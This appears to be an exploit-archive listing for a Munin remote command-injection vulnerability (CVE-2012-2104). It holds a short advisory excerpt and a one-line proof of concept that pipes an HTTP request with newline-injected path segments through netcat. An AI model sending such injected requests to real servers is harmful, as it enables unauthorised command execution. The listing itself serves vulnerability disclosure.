Munin 2.0~rc4-1 - Remote Command Injection
| EKU-ID: 41598 | CVE: CVE-2012-2104;OSVDB-85156 | OSVDB-ID: |
| Author: Helmut Grohne | Published: 2012-04-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 41598 | CVE: CVE-2012-2104;OSVDB-85156 | OSVDB-ID: |
| Author: Helmut Grohne | Published: 2012-04-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80